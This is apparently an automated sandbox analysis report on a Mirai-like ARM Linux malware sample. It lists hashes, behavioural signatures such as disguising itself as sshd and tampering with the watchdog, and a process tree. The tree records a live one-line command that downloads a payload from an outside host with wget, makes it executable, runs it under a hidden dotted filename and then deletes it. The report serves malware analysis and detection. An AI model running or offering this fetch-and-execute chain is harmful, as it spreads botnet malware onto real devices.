Analysis
-
max time kernel
148s -
max time network
141s -
platform
debian-9_armhf -
resource
debian9-armhf-20240226-en -
resource tags
arch:armhfimage:debian9-armhf-20240226-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem -
submitted
02/04/2024, 01:15
Behavioral task
behavioral1
Sample
8dba2039fd6f20170d4f1046a5a9d3413c58a657ce34658f5681e07296263d95.elf
Resource
debian9-armhf-20240226-en
General
-
Target
8dba2039fd6f20170d4f1046a5a9d3413c58a657ce34658f5681e07296263d95.elf
-
Size
122KB
-
MD5
74ca17a962720262e4449302a1b295d7
-
SHA1
90e9582e7bd4b5766899957a8cb5975124ebac7a
-
SHA256
8dba2039fd6f20170d4f1046a5a9d3413c58a657ce34658f5681e07296263d95
-
SHA512
cd2bb89b171c83f4f2491c05411b85b1c854b941922e119880a8400fcacd1178a2035786049f1db51327d0c5e266c5c5773ac91e7f4749c0db0edb1a0f50ca24
-
SSDEEP
3072:FDcYVLWKlAQTv+mYUbpl2m7/L7QsvmGugiNb:WYVxlAk9YUbH2m7/L7QsvmGugiNb
Malware Config
Signatures
-
Changes its process name 1 IoCs
description ioc pid Process Changes the process name, possibly in an attempt to hide itself sshd 658 8dba2039fd6f20170d4f1046a5a9d3413c58a657ce34658f5681e07296263d95.elf -
Executes dropped EXE 1 IoCs
ioc pid Process /tmp/..... 676 ..... -
Modifies Watchdog functionality 1 TTPs 2 IoCs
Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.
description ioc File opened for modification /dev/watchdog File opened for modification /dev/misc/watchdog -
Reads system routing table 1 TTPs 1 IoCs
Gets active network interfaces from /proc virtual filesystem.
description ioc Process File opened for reading /proc/net/route 8dba2039fd6f20170d4f1046a5a9d3413c58a657ce34658f5681e07296263d95.elf -
Reads system network configuration 1 TTPs 1 IoCs
Uses contents of /proc filesystem to enumerate network settings.
description ioc Process File opened for reading /proc/net/route 8dba2039fd6f20170d4f1046a5a9d3413c58a657ce34658f5681e07296263d95.elf -
Writes file to tmp directory 1 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/..... wget
Processes
-
/tmp/8dba2039fd6f20170d4f1046a5a9d3413c58a657ce34658f5681e07296263d95.elf/tmp/8dba2039fd6f20170d4f1046a5a9d3413c58a657ce34658f5681e07296263d95.elf1⤵
- Changes its process name
- Reads system routing table
- Reads system network configuration
PID:658 -
/bin/sh/bin/sh -c "wget -q http://gay.energy/.../vivid -O .....;chmod 777 .....;./.....;rm -rf ....."2⤵PID:659
-
/usr/bin/wgetwget -q http://gay.energy/.../vivid -O .....3⤵
- Writes file to tmp directory
PID:663
-
-
/bin/chmodchmod 777 .....3⤵PID:674
-
-
/tmp/....../.....3⤵
- Executes dropped EXE
PID:676
-
-
/bin/sh/bin/sh ./.....3⤵PID:676
-
-
/bin/rmrm -rf .....3⤵PID:680
-
-